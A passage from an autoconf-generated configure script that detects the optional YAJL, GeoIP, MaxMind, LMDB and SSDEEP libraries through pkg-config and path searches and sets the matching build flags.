test -z "${YAJL_MANDATORY}"; then if test -z "${YAJL_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: YAJL library was not found" >&5 $as_echo "$as_me: YAJL library was not found" >&6;} YAJL_FOUND=0 else YAJL_FOUND=2 fi else as_fn_error $? "YAJL was explicitly referenced but it was not found" "$LINENO" 5 YAJL_FOUND=-1 fi else YAJL_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using YAJL v${YAJL_VERSION}" >&5 $as_echo "$as_me: using YAJL v${YAJL_VERSION}" >&6;} YAJL_CFLAGS="-DWITH_YAJL ${YAJL_CFLAGS}" YAJL_DISPLAY="${YAJL_LDADD}, ${YAJL_CFLAGS}" fi if test "$YAJL_VERSION" != ""; then YAJL_VERSION_TRUE= YAJL_VERSION_FALSE='#' else YAJL_VERSION_TRUE='#' YAJL_VERSION_FALSE= fi # Check for LibGeoIP # Needed if pkg-config will be used. # Possible names for the geoip library/package (pkg-config) GEOIP_POSSIBLE_LIB_NAMES="geoip2 geoip GeoIP" # Possible extensions for the library GEOIP_POSSIBLE_EXTENSIONS="so la sl dll dylib" # Possible paths (if pkg-config was not found, proceed with the file lookup) GEOIP_POSSIBLE_PATHS="/usr/local/libgeoip /usr/local/geoip /usr/local /opt/libgeoip /opt/geoip /opt /usr /opt/local/include /opt/local /usr/lib /usr/local/lib /usr/lib64 /usr" # Variables to be set by this very own script. GEOIP_VERSION="" GEOIP_CFLAGS="" GEOIP_CPPFLAGS="" GEOIP_LDADD="" GEOIP_LDFLAGS="" # Check whether --with-geoip was given. if test "${with_geoip+set}" = set; then : withval=$with_geoip; fi # AS_HELP_STRING( # [--without-geoip], # [Complete dsiables GeoIP support] # ) if test "x${with_geoip}" == "xno"; then $as_echo "#define HAVE_GEOIP 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for GeoIP was disabled by the utilization of --without-geoip or --with-geoip=no" >&5 $as_echo "$as_me: Support for GeoIP was disabled by the utilization of --without-geoip or --with-geoip=no" >&6;} GEOIP_DISABLED=yes else if test "x${with_geoip}" == "xyes"; then GEOIP_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP support was marked as mandatory by the utilization of --with-geoip=yes" >&5 $as_echo "$as_me: GeoIP support was marked as mandatory by the utilization of --with-geoip=yes" >&6;} fi # for x in ${GEOIP_POSSIBLE_LIB_NAMES}; do # CHECK_FOR_GEOIP_AT(${x}) # if test -n "${GEOIP_VERSION}"; then # break # fi # done # if test "x${with_geoip}" != "xyes" or test "x${with_geoip}" == "xyes"; then if test "x${with_geoip}" == "x" || test "x${with_geoip}" == "xyes"; then # Nothing about GeoIP was informed, using the pkg-config to figure things out. if test -n "${PKG_CONFIG}"; then GEOIP_PKG_NAME="" for x in ${GEOIP_POSSIBLE_LIB_NAMES}; do if ${PKG_CONFIG} --exists ${x}; then GEOIP_PKG_NAME="$x" break fi done fi { $as_echo "$as_me:${as_lineno-$LINENO}: Nothing about GeoIP was informed during the configure phase. Trying to detect it on the platform..." >&5 $as_echo "$as_me: Nothing about GeoIP was informed during the configure phase. Trying to detect it on the platform..." >&6;} if test -n "${GEOIP_PKG_NAME}"; then # Package was found using the pkg-config scripts GEOIP_VERSION="`${PKG_CONFIG} ${GEOIP_PKG_NAME} --modversion`" GEOIP_CFLAGS="`${PKG_CONFIG} ${GEOIP_PKG_NAME} --cflags`" GEOIP_LDADD="`${PKG_CONFIG} ${GEOIP_PKG_NAME} --libs-only-l`" GEOIP_LDFLAGS="`${PKG_CONFIG} ${GEOIP_PKG_NAME} --libs-only-L --libs-only-other`" GEOIP_DISPLAY="${GEOIP_LDADD}, ${GEOIP_CFLAGS}" else # If pkg-config did not find anything useful, go over file lookup. for x in ${GEOIP_POSSIBLE_PATHS}; do path=${x} for y in ${GEOIP_POSSIBLE_EXTENSIONS}; do for z in ${GEOIP_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then geoip_lib_path="${path}/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then geoip_lib_path="${path}/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then geoip_lib_path="${path}/lib/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib64/lib${z}.${y}"; then geoip_lib_path="${path}/lib64/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then geoip_lib_path="${path}/lib/x86_64-linux-gnu/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi done if test -n "$geoip_lib_path"; then break fi done if test -e "${path}/include/GeoIPCity.h"; then geoip_inc_path="${path}/include" elif test -e "${path}/GeoIPCity.h"; then geoip_inc_path="${path}" fi if test -n "${geoip_inc_path}" -a -n "${geoip_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP headers found at: ${geoip_inc_path}" >&5 $as_echo "$as_me: GeoIP headers found at: ${geoip_inc_path}" >&6;} { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP library found at: ${geoip_lib_file}" >&5 $as_echo "$as_me: GeoIP library found at: ${geoip_lib_file}" >&6;} fi if test -n "${geoip_lib_path}" -a -n "${geoip_inc_path}"; then # TODO: Compile a piece of code to check the version. GEOIP_CFLAGS="-I${geoip_inc_path}" GEOIP_LDADD="-l${geoip_lib_name}" GEOIP_LDFLAGS="-L${geoip_lib_path}" GEOIP_DISPLAY="${geoip_lib_file}, ${geoip_inc_path}" fi if test -n "${GEOIP_VERSION}"; then break fi done fi fi if test "x${with_geoip}" != "x"; then # An specific path was informed, lets check. GEOIP_MANDATORY=yes path=${with_geoip} for y in ${GEOIP_POSSIBLE_EXTENSIONS}; do for z in ${GEOIP_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then geoip_lib_path="${path}/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then geoip_lib_path="${path}/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then geoip_lib_path="${path}/lib/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib64/lib${z}.${y}"; then geoip_lib_path="${path}/lib64/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then geoip_lib_path="${path}/lib/x86_64-linux-gnu/" geoip_lib_name="${z}" geoip_lib_file="${geoip_lib_path}/lib${z}.${y}" break fi done if test -n "$geoip_lib_path"; then break fi done if test -e "${path}/include/GeoIPCity.h"; then geoip_inc_path="${path}/include" elif test -e "${path}/GeoIPCity.h"; then geoip_inc_path="${path}" fi if test -n "${geoip_inc_path}" -a -n "${geoip_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP headers found at: ${geoip_inc_path}" >&5 $as_echo "$as_me: GeoIP headers found at: ${geoip_inc_path}" >&6;} { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP library found at: ${geoip_lib_file}" >&5 $as_echo "$as_me: GeoIP library found at: ${geoip_lib_file}" >&6;} fi if test -n "${geoip_lib_path}" -a -n "${geoip_inc_path}"; then # TODO: Compile a piece of code to check the version. GEOIP_CFLAGS="-I${geoip_inc_path}" GEOIP_LDADD="-l${geoip_lib_name}" GEOIP_LDFLAGS="-L${geoip_lib_path}" GEOIP_DISPLAY="${geoip_lib_file}, ${geoip_inc_path}" fi fi # fi fi if test -z "${GEOIP_CFLAGS}"; then if test -z "${GEOIP_MANDATORY}"; then if test -z "${GEOIP_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: GeoIP library was not found" >&5 $as_echo "$as_me: GeoIP library was not found" >&6;} GEOIP_FOUND=0 else GEOIP_FOUND=2 fi else as_fn_error $? "GeoIP was explicit requested but it was not found" "$LINENO" 5 GEOIP_FOUND=-1 fi else GEOIP_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using GeoIP v${GEOIP_VERSION}" >&5 $as_echo "$as_me: using GeoIP v${GEOIP_VERSION}" >&6;} GEOIP_CFLAGS="-DWITH_GEOIP ${GEOIP_CFLAGS}" fi if test "GEOIP_CFLAGS" != ""; then GEOIP_CFLAGS_TRUE= GEOIP_CFLAGS_FALSE='#' else GEOIP_CFLAGS_TRUE='#' GEOIP_CFLAGS_FALSE= fi # Check for MaxMind # Needed if pkg-config will be used. # Possible names for the maxmind library/package (pkg-config) MAXMIND_POSSIBLE_LIB_NAMES="libmaxminddb maxminddb maxmind" # Possible extensions for the library MAXMIND_POSSIBLE_EXTENSIONS="so la sl dll dylib" # Possible paths (if pkg-config was not found, proceed with the file lookup) MAXMIND_POSSIBLE_PATHS="/usr/local/libmaxmind /usr/local/maxmind /usr/local /opt/libmaxmind /opt/maxmind /opt /usr /opt/local/include /opt/local /usr/lib /usr/local/lib /usr/lib64 /usr /usr/include/x86_64-linux-gnu/" # Variables to be set by this very own script. MAXMIND_VERSION="" MAXMIND_CFLAGS="" MAXMIND_CPPFLAGS="" MAXMIND_LDADD="" MAXMIND_LDFLAGS="" # Check whether --with-maxmind was given. if test "${with_maxmind+set}" = set; then : withval=$with_maxmind; fi # AS_HELP_STRING( # [--without-maxmind], # [Complete dsiables MaxMind support] # ) if test "x${with_maxmind}" == "xno"; then $as_echo "#define HAVE_MAXMIND 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for MaxMind was disabled by the utilization of --without-maxmind or --with-maxmind=no" >&5 $as_echo "$as_me: Support for MaxMind was disabled by the utilization of --without-maxmind or --with-maxmind=no" >&6;} MAXMIND_DISABLED=yes else if test "x${with_maxmind}" == "xyes"; then MAXMIND_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind support was marked as mandatory by the utilization of --with-maxmind=yes" >&5 $as_echo "$as_me: MaxMind support was marked as mandatory by the utilization of --with-maxmind=yes" >&6;} fi # for x in ${MAXMIND_POSSIBLE_LIB_NAMES}; do # CHECK_FOR_MAXMIND_AT(${x}) # if test -n "${MAXMIND_VERSION}"; then # break # fi # done # if test "x${with_maxmind}" != "xyes" or test "x${with_maxmind}" == "xyes"; then if test "x${with_maxmind}" == "x" || test "x${with_maxmind}" == "xyes"; then # Nothing about MaxMind was informed, using the pkg-config to figure things out. if test -n "${PKG_CONFIG}"; then MAXMIND_PKG_NAME="" for x in ${MAXMIND_POSSIBLE_LIB_NAMES}; do if ${PKG_CONFIG} --exists ${x}; then MAXMIND_PKG_NAME="$x" break fi done fi { $as_echo "$as_me:${as_lineno-$LINENO}: Nothing about MaxMind was informed during the configure phase. Trying to detect it on the platform..." >&5 $as_echo "$as_me: Nothing about MaxMind was informed during the configure phase. Trying to detect it on the platform..." >&6;} if test -n "${MAXMIND_PKG_NAME}"; then # Package was found using the pkg-config scripts MAXMIND_VERSION="`${PKG_CONFIG} ${MAXMIND_PKG_NAME} --modversion`" MAXMIND_CFLAGS="`${PKG_CONFIG} ${MAXMIND_PKG_NAME} --cflags`" MAXMIND_LDADD="`${PKG_CONFIG} ${MAXMIND_PKG_NAME} --libs-only-l`" MAXMIND_LDFLAGS="`${PKG_CONFIG} ${MAXMIND_PKG_NAME} --libs-only-L --libs-only-other`" MAXMIND_DISPLAY="${MAXMIND_LDADD}" else # If pkg-config did not find anything useful, go over file lookup. for x in ${MAXMIND_POSSIBLE_PATHS}; do path=${x} for y in ${MAXMIND_POSSIBLE_EXTENSIONS}; do for z in ${MAXMIND_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then maxmind_lib_path="${path}/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then maxmind_lib_path="${path}/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then maxmind_lib_path="${path}/lib/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib64/lib${z}.${y}"; then maxmind_lib_path="${path}/lib64/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then maxmind_lib_path="${path}/lib/x86_64-linux-gnu/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi done if test -n "$maxmind_lib_path"; then break fi done if test -e "${path}/include/maxminddb.h"; then maxmind_inc_path="${path}/include" elif test -e "${path}/maxminddb.h"; then maxmind_inc_path="${path}" fi if test -n "${maxmind_inc_path}" -a -n "${maxmind_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind headers found at: ${maxmind_inc_path}" >&5 $as_echo "$as_me: MaxMind headers found at: ${maxmind_inc_path}" >&6;} { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind library found at: ${maxmind_lib_file}" >&5 $as_echo "$as_me: MaxMind library found at: ${maxmind_lib_file}" >&6;} fi if test -n "${maxmind_lib_path}" -a -n "${maxmind_inc_path}"; then # TODO: Compile a piece of code to check the version. MAXMIND_CFLAGS="-I${maxmind_inc_path}" MAXMIND_LDADD="-l${maxmind_lib_name}" MAXMIND_LDFLAGS="-L${maxmind_lib_path}" MAXMIND_DISPLAY="${maxmind_lib_file}, ${maxmind_inc_path}" fi if test -n "${MAXMIND_VERSION}"; then break fi done fi fi if test "x${with_maxmind}" != "x"; then # An specific path was informed, lets check. MAXMIND_MANDATORY=yes path=${with_maxmind} for y in ${MAXMIND_POSSIBLE_EXTENSIONS}; do for z in ${MAXMIND_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then maxmind_lib_path="${path}/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then maxmind_lib_path="${path}/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then maxmind_lib_path="${path}/lib/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib64/lib${z}.${y}"; then maxmind_lib_path="${path}/lib64/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then maxmind_lib_path="${path}/lib/x86_64-linux-gnu/" maxmind_lib_name="${z}" maxmind_lib_file="${maxmind_lib_path}/lib${z}.${y}" break fi done if test -n "$maxmind_lib_path"; then break fi done if test -e "${path}/include/maxminddb.h"; then maxmind_inc_path="${path}/include" elif test -e "${path}/maxminddb.h"; then maxmind_inc_path="${path}" fi if test -n "${maxmind_inc_path}" -a -n "${maxmind_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind headers found at: ${maxmind_inc_path}" >&5 $as_echo "$as_me: MaxMind headers found at: ${maxmind_inc_path}" >&6;} { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind library found at: ${maxmind_lib_file}" >&5 $as_echo "$as_me: MaxMind library found at: ${maxmind_lib_file}" >&6;} fi if test -n "${maxmind_lib_path}" -a -n "${maxmind_inc_path}"; then # TODO: Compile a piece of code to check the version. MAXMIND_CFLAGS="-I${maxmind_inc_path}" MAXMIND_LDADD="-l${maxmind_lib_name}" MAXMIND_LDFLAGS="-L${maxmind_lib_path}" MAXMIND_DISPLAY="${maxmind_lib_file}, ${maxmind_inc_path}" fi fi # fi fi if test -z "${MAXMIND_DISPLAY}"; then if test -z "${MAXMIND_MANDATORY}"; then if test -z "${MAXMIND_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: MaxMind library was not found" >&5 $as_echo "$as_me: MaxMind library was not found" >&6;} MAXMIND_FOUND=0 else MAXMIND_FOUND=2 fi else as_fn_error $? "MaxMind was explicit requested but it was not found" "$LINENO" 5 MAXMIND_FOUND=-1 fi else MAXMIND_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using MaxMind v${MAXMIND_VERSION}" >&5 $as_echo "$as_me: using MaxMind v${MAXMIND_VERSION}" >&6;} MAXMIND_CFLAGS="-DWITH_MAXMIND ${MAXMIND_CFLAGS}" if ! test "x$MAXMIND_CFLAGS" = "x"; then MAXMIND_DISPLAY="${MAXMIND_DISPLAY}, ${MAXMIND_CFLAGS}" fi fi if test "MAXMIND_CFLAGS" != ""; then MAXMIND_CFLAGS_TRUE= MAXMIND_CFLAGS_FALSE='#' else MAXMIND_CFLAGS_TRUE='#' MAXMIND_CFLAGS_FALSE= fi # Check for LMDB # Needed if pkg-config will be used.LMDB # Possible names for the lmdb library/package (pkg-config) LMDB_POSSIBLE_LIB_NAMES="lmdb" # Possible extensions for the library LMDB_POSSIBLE_EXTENSIONS="so so0 la sl dll dylib so.0.0.0" # Possible paths (if pkg-config was not found, proceed with the file lookup) LMDB_POSSIBLE_PATHS="/usr/lib /usr/local/lib /usr/local/liblmdb /usr/local/lmdb /usr/local /opt/liblmdb /opt/lmdb /opt /usr /usr/lib64 /opt/local" # Variables to be set by this very own script. LMDB_VERSION="" LMDB_CFLAGS="" LMDB_CPPFLAGS="" LMDB_LDADD="" LMDB_LDFLAGS="" # Check whether --with-lmdb was given. if test "${with_lmdb+set}" = set; then : withval=$with_lmdb; fi if test "x${with_lmdb}" == "xno"; then $as_echo "#define HAVE_LMDB 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for LMDB was disabled by the utilization of --without-lmdb or --with-lmdb=no" >&5 $as_echo "$as_me: Support for LMDB was disabled by the utilization of --without-lmdb or --with-lmdb=no" >&6;} LMDB_DISABLED=yes else if test "x${with_lmdb}" == "xyes"; then LMDB_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB support was marked as mandatory by the utilization of --with-lmdb=yes" >&5 $as_echo "$as_me: LMDB support was marked as mandatory by the utilization of --with-lmdb=yes" >&6;} fi # for x in ${LMDB_POSSIBLE_LIB_NAMES}; do # CHECK_FOR_LMDB_AT(${x}) # if test -n "${LMDB_VERSION}"; then # break # fi # done # if test "x${with_lmdb}" != "xyes" or test "x${with_lmdb}" == "xyes"; then if test "x${with_lmdb}" == "x" || test "x${with_lmdb}" == "xyes"; then # Nothing about LMDB was informed, using the pkg-config to figure things out. if test -n "${PKG_CONFIG}"; then LMDB_PKG_NAME="" for x in ${LMDB_POSSIBLE_LIB_NAMES}; do if ${PKG_CONFIG} --exists ${x}; then LMDB_PKG_NAME="$x" break fi done fi { $as_echo "$as_me:${as_lineno-$LINENO}: Nothing about LMDB was informed during the configure phase. Trying to detect it on the platform..." >&5 $as_echo "$as_me: Nothing about LMDB was informed during the configure phase. Trying to detect it on the platform..." >&6;} if test -n "${LMDB_PKG_NAME}"; then # Package was found using the pkg-config scripts LMDB_VERSION="`${PKG_CONFIG} ${LMDB_PKG_NAME} --modversion`" LMDB_CFLAGS="`${PKG_CONFIG} ${LMDB_PKG_NAME} --cflags`" LMDB_LDADD="`${PKG_CONFIG} ${LMDB_PKG_NAME} --libs-only-l`" LMDB_LDFLAGS="`${PKG_CONFIG} ${LMDB_PKG_NAME} --libs-only-L --libs-only-other`" LMDB_DISPLAY="${LMDB_LDADD}, ${LMDB_CFLAGS}" else # If pkg-config did not find anything useful, go over file lookup. for x in ${LMDB_POSSIBLE_PATHS}; do path=${x} echo "*** LOOKING AT PATH: " ${path} for y in ${LMDB_POSSIBLE_EXTENSIONS}; do for z in ${LMDB_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then lmdb_lib_path="${path}/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then lmdb_lib_path="${path}/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/x86_64-linux-gnu/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/i386-linux-gnu/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/i386-linux-gnu/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi done if test -n "$lmdb_lib_path"; then break fi done if test -e "${path}/include/lmdb.h"; then lmdb_inc_path="${path}/include" elif test -e "${path}/lmdb.h"; then lmdb_inc_path="${path}" elif test -e "${path}/include/lmdb/lmdb.h"; then lmdb_inc_path="${path}/include" fi if test -n "${lmdb_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB library found at: ${lmdb_lib_file}" >&5 $as_echo "$as_me: LMDB library found at: ${lmdb_lib_file}" >&6;} fi if test -n "${lmdb_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB headers found at: ${lmdb_inc_path}" >&5 $as_echo "$as_me: LMDB headers found at: ${lmdb_inc_path}" >&6;} fi if test -n "${lmdb_lib_path}" -a -n "${lmdb_inc_path}"; then # TODO: Compile a piece of code to check the version. LMDB_CFLAGS="-I${lmdb_inc_path}" LMDB_LDADD="-l${lmdb_lib_name}" LMDB_LDFLAGS="-L${lmdb_lib_path}" LMDB_DISPLAY="${lmdb_lib_file}, ${lmdb_inc_path}" fi if test -n "${LMDB_VERSION}"; then break fi done fi fi if test "x${with_lmdb}" != "x"; then # An specific path was informed, lets check. LMDB_MANDATORY=yes path=${with_lmdb} echo "*** LOOKING AT PATH: " ${path} for y in ${LMDB_POSSIBLE_EXTENSIONS}; do for z in ${LMDB_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then lmdb_lib_path="${path}/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then lmdb_lib_path="${path}/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/x86_64-linux-gnu/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/i386-linux-gnu/lib${z}.${y}"; then lmdb_lib_path="${path}/lib/i386-linux-gnu/" lmdb_lib_name="${z}" lmdb_lib_file="${lmdb_lib_path}/lib${z}.${y}" break fi done if test -n "$lmdb_lib_path"; then break fi done if test -e "${path}/include/lmdb.h"; then lmdb_inc_path="${path}/include" elif test -e "${path}/lmdb.h"; then lmdb_inc_path="${path}" elif test -e "${path}/include/lmdb/lmdb.h"; then lmdb_inc_path="${path}/include" fi if test -n "${lmdb_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB library found at: ${lmdb_lib_file}" >&5 $as_echo "$as_me: LMDB library found at: ${lmdb_lib_file}" >&6;} fi if test -n "${lmdb_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB headers found at: ${lmdb_inc_path}" >&5 $as_echo "$as_me: LMDB headers found at: ${lmdb_inc_path}" >&6;} fi if test -n "${lmdb_lib_path}" -a -n "${lmdb_inc_path}"; then # TODO: Compile a piece of code to check the version. LMDB_CFLAGS="-I${lmdb_inc_path}" LMDB_LDADD="-l${lmdb_lib_name}" LMDB_LDFLAGS="-L${lmdb_lib_path}" LMDB_DISPLAY="${lmdb_lib_file}, ${lmdb_inc_path}" fi fi # fi fi if test -z "${LMDB_LDADD}"; then if test -z "${LMDB_MANDATORY}"; then if test -z "${LMDB_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB library was not found" >&5 $as_echo "$as_me: LMDB library was not found" >&6;} LMDB_FOUND=0 else LMDB_FOUND=2 fi else as_fn_error $? "LMDB was explicitly referenced but it was not found" "$LINENO" 5 LMDB_FOUND=-1 fi else if test -z "${LMDB_MANDATORY}"; then LMDB_FOUND=2 { $as_echo "$as_me:${as_lineno-$LINENO}: LMDB is disabled by default." >&5 $as_echo "$as_me: LMDB is disabled by default." >&6;} else LMDB_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using LMDB v${LMDB_VERSION}" >&5 $as_echo "$as_me: using LMDB v${LMDB_VERSION}" >&6;} LMDB_CFLAGS="-DWITH_LMDB ${LMDB_CFLAGS}" LMDB_DISPLAY="${LMDB_LDADD}, ${LMDB_CFLAGS}" fi fi if test "LMDB_CFLAGS" != ""; then LMDB_CFLAGS_TRUE= LMDB_CFLAGS_FALSE='#' else LMDB_CFLAGS_TRUE='#' LMDB_CFLAGS_FALSE= fi # Check for SSDEEP # Possible names for the ssdeep library/package (pkg-config) SSDEEP_POSSIBLE_LIB_NAMES="fuzzy" # Possible extensions for the library SSDEEP_POSSIBLE_EXTENSIONS="so so0 la sl dll dylib so.0.0.0" # Possible paths (if pkg-config was not found, proceed with the file lookup) SSDEEP_POSSIBLE_PATHS="/usr/lib /usr/local/lib /usr/local/fuzzy /usr/local/libfuzzy /usr/local /opt /usr /usr/lib64 /opt/local" # Variables to be set by this very own script. SSDEEP_CFLAGS="" SSDEEP_LDFLAGS="" SSDEEP_LDADD="" SSDEEP_DISPLAY="" # Check whether --with-ssdeep was given. if test "${with_ssdeep+set}" = set; then : withval=$with_ssdeep; fi if test "x${with_ssdeep}" == "xno"; then $as_echo "#define HAVE_SSDEEP 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for SSDEEP was disabled by the utilization of --without-ssdeep or --with-ssdeep=no" >&5 $as_echo "$as_me: Support for SSDEEP was disabled by the utilization of --without-ssdeep or --with-ssdeep=no" >&6;} SSDEEP_DISABLED=yes else if test "x${with_ssdeep}" == "xyes"; then SSDEEP_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: SSDEEP support was marked as mandatory by the utilization of --with-ssdeep=yes" >&5 $as_echo "$as_me: SSDEEP support was marked as mandatory by the utilization of --with-ssdeep=yes" >&6;} else SSDEEP_MANDATORY=no fi for x in ${SSDEEP_POSSIBLE_PATHS}; do path=${x} echo "*** LOOKING AT PATH: " ${path} for y in ${SSDEEP_POSSIBLE_EXTENSIONS}; do for z in ${SSDEEP_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then ssdeep_lib_path="${path}/" ssdeep_lib_name="${z}" ssdeep_lib_file="${ssdeep_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then ssdeep_lib_path="${path}/" ssdeep_lib_name="${z}" ssdeep_lib_file="${ssdeep_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then ssdeep_lib_path="${path}/lib/" ssdeep_lib_name="${z}" ssdeep_lib_file="${ssdeep_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then ssdeep_lib_path="${path}/lib/x86_64-linux-gnu/" ssdeep_lib_name="${z}" ssdeep_lib_file="${ssdeep_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/i386-linux-gnu/lib${z}.${y}"; then ssdeep_lib_path="${path}/lib/i386-linux-gnu/" ssdeep_lib_name="${z}" ssdeep_lib_file="${ssdeep_lib_path}/lib${z}.${y}" break fi done if test -n "$ssdeep_lib_path"; then break fi done if test -e "${path}/include/fuzzy.h"; then ssdeep_inc_path="${path}/include" elif test -e "${path}/fuzzy.h"; then ssdeep_inc_path="${path}" elif test -e "${path}/include/fuzzy/fuzzy.h"; then ssdeep_inc_path="${path}/include" fi if test -n "${ssdeep_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: SSDEEP library found at: ${ssdeep_lib_file}" >&5 $as_echo "$as_me: SSDEEP library found at: ${ssdeep_lib_file}" >&6;} fi if test -n "${ssdeep_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: SSDEEP headers found at: ${ssdeep_inc_path}" >&5 $as_echo "$as_me: SSDEEP headers found at: ${ssdeep_inc_path}" >&6;} fi if test -n "${ssdeep_lib_path}" -a -n "${ssdeep_inc_path}"; then # TODO: Compile a piece of code to check the version. SSDEEP_CFLAGS="-I${ssdeep_inc_path}" SSDEEP_LDADD="-l${ssdeep_lib_name}" SSDEEP_LDFLAGS="-L${ssdeep_lib_path}" SSDEEP_DISPLAY="${ssdeep_lib_file}, ${ssdeep_inc_path}" fi if test -n "${SSDEEP_CFLAGS}"; then break fi done fi if test -z "${SSDEEP_CFLAGS}"; then if test -z "${SSDEEP_MANDATORY}" || test "x${SSDEEP_MANDATORY}" == "xno"; then if test -z "${SSDEEP_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: SSDEEP library was not found" >&5 $as_echo "$as_me: SSDEEP library was not found" >&6;} SSDEEP_FOUND=0 else 